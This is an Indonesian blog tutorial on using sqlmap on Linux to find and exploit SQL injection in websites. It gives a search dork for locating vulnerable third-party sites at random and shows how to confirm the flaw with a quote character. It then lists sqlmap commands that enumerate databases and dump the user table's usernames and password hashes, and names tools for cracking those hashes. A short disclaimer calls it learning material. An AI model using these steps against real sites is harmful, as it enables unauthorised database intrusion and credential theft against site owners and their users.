Cara Menggunakan SQLMap Untuk Pemula Di Linux

Bagaimana cara menggunakan sqlmap di linux ubuntu? Mungkin saat ini kamu ingin melakukan uji coba keamanan website kamu atau website teman, ingat artikel ini dibuat untuk bahan pembelajaran saja jadi apabila anda salah menggunakan tutorial ini itu sudah tidak tanggung jawab kami lagi.

Berbicara soal SQLMAP pastinya tidak jauh-jauh dari serangan SQL Injection yang bertujuan untuk menemukan kerentanan keamanan website menggunakan sqlmap. Dengan menggunakan sqlmap kita dapat menemukan beberapa informasi database seperti password dan username admin.

Melakukan Serangan SQL Injection pada umumnya ada banyak sekali caranya, bisa menggunakan sql injection manual, menggunakan tools dan jenis serangan sql injection pun ada banyak jenis-jenisnya, mulai dari In-band SQL Injection, Error-based SQLI , Union-based SQLI, Inferential SQL Injection (Blind SQLI), setelah kamu sudah mengetahui jenis-jenis serangan sql injection.

Di artikel ini saya tidak akan membahas seluruh pengertian jenis-jenis serangan sql injection lebih dalam, apabila kamu mencari pengertian jenis-jenis serangan sql injection kamu bisa mencari informasinya melalui google, di artikel ini saya akan mengajarkan kamu cara menggunakan sqlmap di linux ubuntu.

Apa Itu SQLmap?

SQLmap adalah sebuah alat uji penetrasi open source yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih database server. Tampil dengan mesin pendeteksi yang hebat, banyak fitur khusus untuk penguji penetrasi akhir dan berbagai switch yang bertahan dari database, melebihi pengambilan data dari database, untuk mengakses sistem berkas yang mendasarinya dan menjalankan perintah pada sistem operasi melalui sistem operasi out-of-band connections.

Cara Menggunakan SQLMap

Agar kita dapat menggunakan sqlmap untuk melakukan serangan sql injection pada suatu situs, langkah awal yang harus kamu siapkan. Kamu harus menginstall sqlmap di sistem operasi kamu, kamu bisa menginstall sqlmap di linux, windows dan sistem operasi lainya, kalau kamu menggunakan linux kamu bisa melihat cara install sqlmap di linux.

Kalau kamu sudah mempunyai alat sqlmap sekarang kita masuk ke topik utama artikel yaitu cara menggunakan sqlmap.

1. Cari Situs Yang Memiliki Bug SQL Injection

Tahap pertama hal yang harus kita lakukan, adalah mencari situs yang memiliki bug sql injection untuk mencari celah sql injection kita bisa memanfaatkan dork, dengan dork kita bisa menemukan daftar situs yang memiliki celah sql injection berikut cara menggunakan dork dan mencari bug sql injection menggunakan dork sql injection.

Dork SQL Injection: inurl:news.php?id= site:.com "2022"

Agar kamu dapat mencari situs yang memiliki celah sql injection kamu bisa menggunakan dork yang sudah saya berikan, sekarang kita sudah mempunyai dork dan daftar situs yang ingin kita uji coba keamanannya.

Contoh situs ini: https://www.demo.com/news.php?id=51

Nah untuk mengetahui apakah situs demo yang saya jadikan contoh ini memiliki celah sql injection apa tidak, kita bisa menambahkan tanda string di belakang angka dan menjadi seperti ini https://www.demo.com/news.php?id=51‘ String ( ‘ ) nantinya kamu akan menemukan notifikasi tampilan

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

Di sini kita menemukan sebuah pesan “You have an error in your sql syntax, dan sekarang kita coba melakukan serangan sql injection, menggunakan sqlmap. Disini saya menggunakan sqlmap di linux ubuntu.

Untuk mengetahui seluruh perintah dasar di sqlmap kamu bisa menggunakan perintah dasar ” sqlmap -h ” dengan mengetikan perintah sqlmap -h kamu akan menemukan seluruh panduan perintah dasar pada alat sqlmap untuk lebih lengkapnya kamu bisa menggunakan perintah “sqlmap -hh“. Disini saya anggap kamu sudah paham seluruh perintah yang ada di sqlmap seperti –dbs, –tables, –dump, –users, dan –passwords.

2. Jalankan SQLMAP Dan Mulai Mencari Celah SQL Injection

Setelah kita sudah menemukan target yang ingin kita uji coba, sekarang kita jalankan sqlmap dan mulai mencari celah sql injection pada situs-situs tertentu.

Ketikan di terminal linux dan ketikan perintah sebagai berikut.

Artikel Rekomendasi : 

Bug PPPD Di Sistem Operasi Linux ,Hacker Mampu Melakukan Serangan Remote Code Execution (RCE)
Belajar Instalasi Linux Debian 10 Berbasis GUI Untuk Pemula
Mengenal Perintah Dasar Sistem Operasi Linux Untuk Pemula
Cara Install Steam Di Linux/ Ubuntu

sqlmap -u https://www.demo.com/news.php?id=51 --dbs

Dan setelah kamu sudah memasukan perintah yang sudah saya sebutkan tadi kemudian tekan enter, dan sqlmap secara otomatis mencari bug sql injection kamu tinggal tunggu sampai proses nya selesai. Dan nantinya kamu juga akan menemukan informasi database mulai dari table, colum, user, dan password.

Contoh Output SQLMAP Di Terminal Linux:

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:11:39 /2022-07-19/

[08:11:40] [INFO] testing connection to the target URL
[08:11:43] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[08:11:43] [INFO] testing if the target URL content is stable
[08:11:44] [INFO] target URL content is stable
[08:11:44] [INFO] testing if GET parameter 'id' is dynamic
[08:11:45] [WARNING] GET parameter 'id' does not appear to be dynamic
[08:11:46] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:11:48] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[08:11:48] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

Nah untuk perintah lebih lanjut kamu bisa menggunakan beberapa perintah dibawah ini.

sqlmap -u https://www.demo.com/news.php?id=51 --tables -D (nama database) Perintah menemukan tabel di database tertentu.

sqlmap -u https://www.demo.com/news.php?id=51 --columns -D (nama database) -T user (Kalau kamu sudah memiliki daftar table database nya kamu bisa mencari informasi database user seperti username dan password, contoh saja kamu ingin mencari database user kamu bisa mengetikan perintah di atas.

sqlmap -u https://www.demo.com/news.php?id=51 --dump -D (Nama Database) -T user (perintah untuk mengambil data dari tabel dan mengeluarkan data sensitif seperti username dan password.

Nah setelah kita sudah menemukan username dan password nantinya kamu akan menemukan password dalam bentuk hash md5 atau jenis hash password lainnya. Untuk tools hash password kamu bisa menggunakan MD5 Online, Atau Tools JhonTheRipper atau hashcat.

Min kenapa tidak dilanjutkan? maaf saya tidak bisa melanjutkan menjalankan perintah di terminal, karena ini hanya sebatas pembelajaran saja… dan perlu kamu ketahui apabila kamu mempelajari tutorial ini, dan kamu mencoba mendapatkan informasi username dan password situs milik orang lain, itu bukan tanggung jawab kami lagi.